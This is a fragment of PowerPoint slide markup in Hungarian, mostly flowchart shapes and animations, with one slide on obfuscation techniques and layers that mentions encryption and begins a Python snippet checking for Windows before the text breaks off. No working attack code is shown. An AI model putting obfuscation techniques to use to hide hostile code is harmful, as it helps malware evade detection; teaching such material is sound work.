          <p:spPr>
            <a:xfrm>
              <a:off x="6446207" y="4610867"/>
              <a:ext cx="226237" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartCol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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Folyamatábra: Rendezés 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2BD792F-6C1F-4426-BC14-2130878B9CB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5788763" y="4958532"/>
              <a:ext cx="310481" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartSor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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Felirat: négyágú nyíllal 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A89D584-4DBA-4889-8F2D-0E17BE110E96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6908384" y="4630161"/>
              <a:ext cx="635000" cy="566417"/>
            </a:xfrm>
            <a:prstGeom prst="quad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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Folyamatábra: Mágneslemez 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68F4CD1E-5075-40B9-BCD4-677111B572F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7696772" y="3165170"/>
              <a:ext cx="536875" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Folyamatábra: Döntés 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97FE37F7-D050-4DA5-8202-A2E7C8C2F807}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="964795" y="2469380"/>
              <a:ext cx="479364" cy="248759"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDecisi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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="Téglalap: lekerekített 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE128855-8C6C-459C-849D-103F464D3B3A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2090284" y="3462335"/>
              <a:ext cx="772678" cy="43623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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Téglalap 89">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92835C6-679B-4B70-A753-362989BC093C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1801465" y="2412546"/>
              <a:ext cx="349252" cy="36242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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Folyamatábra: Összegzés 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F91D4BF-B231-42F4-93E9-4CEA45FFF90F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1214794" y="3165170"/>
              <a:ext cx="479364" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartSummingJuncti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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Nyíl: jobbra mutató 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9CD49C9-4CCC-49C1-90B8-DC97E2BF2A10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2664911" y="2850978"/>
              <a:ext cx="736600" cy="402625"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Folyamatábra: Válogatás 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD7F250F-592D-4640-B501-5DCD838032E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810827" y="2971446"/>
              <a:ext cx="226237" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartCol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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="120" name="Nyíl: négyágú 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9334FFA-8533-4A29-9337-F635620EA52E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3430565" y="3660020"/>
              <a:ext cx="436239" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="quad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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="Nyíl: négyágú 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1776AC4E-3562-4BFB-8E05-3F61D623773C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2679209" y="5171172"/>
              <a:ext cx="436239" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="quad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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122" name="Nyíl: négyágú 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85D192FC-1546-4969-B067-41CADF43ADFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2846102" y="1860566"/>
              <a:ext cx="436239" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="quad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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="124" name="Folyamatábra: Mágneslemez 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B365751-25D2-490D-B83A-E6FBE9AB66A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3640206" y="5225933"/>
              <a:ext cx="536875" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="Folyamatábra: Mágneslemez 124">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE7A889-B4F8-4524-A948-8945B42A4FDE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5966938" y="5712572"/>
              <a:ext cx="536875" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="Folyamatábra: Mágneslemez 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1206DA91-9249-46BD-AA38-C44765372583}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9699954" y="4880230"/>
              <a:ext cx="536875" cy="436239"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk">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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="127" name="Folyamatábra: Válogatás 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BCC7D7-086B-461A-A9A5-6FAA7E370416}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3448629" y="4497799"/>
              <a:ext cx="226237" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartCol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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="128" name="Folyamatábra: Válogatás 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F77F99E-9473-479C-805E-9C9F18049260}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5018163" y="5474526"/>
              <a:ext cx="226237" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartCol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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="Folyamatábra: Válogatás 128">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12333666-4B36-403C-9A10-FBC9202461D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9367096" y="2117666"/>
              <a:ext cx="226237" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartCol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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="130" name="Folyamatábra: Összegzés 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75432A62-9D58-4F93-B8AE-25F2CBBC975B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2291248" y="4296827"/>
              <a:ext cx="479364" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartSummingJuncti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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="131" name="Folyamatábra: Összegzés 130">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B21AC4-50F5-44B2-95A8-F9B2BD651D07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8381987" y="4309702"/>
              <a:ext cx="479364" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartSummingJuncti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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="132" name="Folyamatábra: Összegzés 131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D2E8775-F423-4723-BD8B-A5FB386279A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8113536" y="5225933"/>
              <a:ext cx="479364" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartSummingJuncti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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="133" name="Folyamatábra: Összegzés 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396AADA5-02F6-45B8-853D-BD0C7F02F05E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10747840" y="2989909"/>
              <a:ext cx="479364" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartSummingJuncti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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="134" name="Folyamatábra: Összegzés 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B88247-D46A-45F3-B4D7-3271338016AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8836512" y="3660020"/>
              <a:ext cx="479364" cy="476092"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartSummingJuncti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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="135" name="Téglalap: lekerekített 134">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5DDABB5-2EC3-43CD-AC3E-425C6BF00C08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8347712" y="2421002"/>
              <a:ext cx="772678" cy="43623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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="136" name="Téglalap: lekerekített 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B54AAA9E-48AE-41AE-A042-249865DC1EFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9487438" y="3244215"/>
              <a:ext cx="772678" cy="43623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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="Téglalap: lekerekített 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EEC3B6C-8C5F-440E-BA6A-4F61C094280E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9937121" y="4039269"/>
              <a:ext cx="772678" cy="43623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u-HU"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Csoportba foglalás 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA9CBB05-3FD1-43E2-AD41-0E7531D5ABF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4924939" y="3620080"/>
            <a:ext cx="1991385" cy="807382"/>
            <a:chOff x="3139891" y="2361251"/>
            <a:chExt cx="5490066" cy="2225878"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Egyenes összekötő nyíllal 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EA52D4-263F-4B8C-B847-491397273EBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="5" idx="4"/>
              <a:endCxn id="4" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5881995" y="2856552"/>
              <a:ext cx="23508" cy="52186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4" name="Egyenes összekötő nyíllal 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C227B700-783A-456A-83CD-533BB90D93EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="4" idx="3"/>
              <a:endCxn id="11" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6672569" y="3721311"/>
              <a:ext cx="271464" cy="52291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Egyenes összekötő nyíllal 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4B6DAAB-C994-470E-AC3A-C8A4A93553F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="4" idx="1"/>
              <a:endCxn id="6" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4825815" y="3721314"/>
              <a:ext cx="265603" cy="52291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 name="Folyamatábra: Döntés 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{007B049B-EE68-47C1-A500-3E4F995F1C7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5091418" y="3378412"/>
              <a:ext cx="1581150" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDecis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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Folyamatábra: Adatok 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5662868D-5213-48E6-9D01-78FB8AC70B8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5114926" y="2361251"/>
              <a:ext cx="1581150" cy="495300"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartInputOutp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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Folyamatábra: Feldolgozás 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327E3868-CD64-4264-8589-A31166C73F6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3139891" y="3901329"/>
              <a:ext cx="1685924" cy="685800"/>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Folyamatábra: Feldolgozás 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{117ECEE8-42A3-4DEF-A8FF-79F143C8A38F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6944033" y="3901329"/>
              <a:ext cx="1685924" cy="685800"/>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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93760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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17"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E7A70C21-0C2D-48D1-B77D-596C1F38F52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785360" y="605176"/>
            <a:ext cx="6523988" cy="456863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">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r"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OBFUSZKÁLÁSI TECHNIKÁK, RÉTEGEK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053A3859-1B85-4547-A8C1-DC39E96F7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742949" y="1363983"/>
            <a:ext cx="10566399" cy="369565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">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hu-HU">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Titkosítás</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A936F6-6200-46E2-B5A7-259A341B6274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742948" y="1126815"/>
            <a:ext cx="1056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zövegdoboz 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62FAFEE-15E6-40CE-9899-7B71C9E604AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071368" y="1842610"/>
            <a:ext cx="7909560" cy="1477328"/>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hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>osplat=platform.system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if osplat=="Windows":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
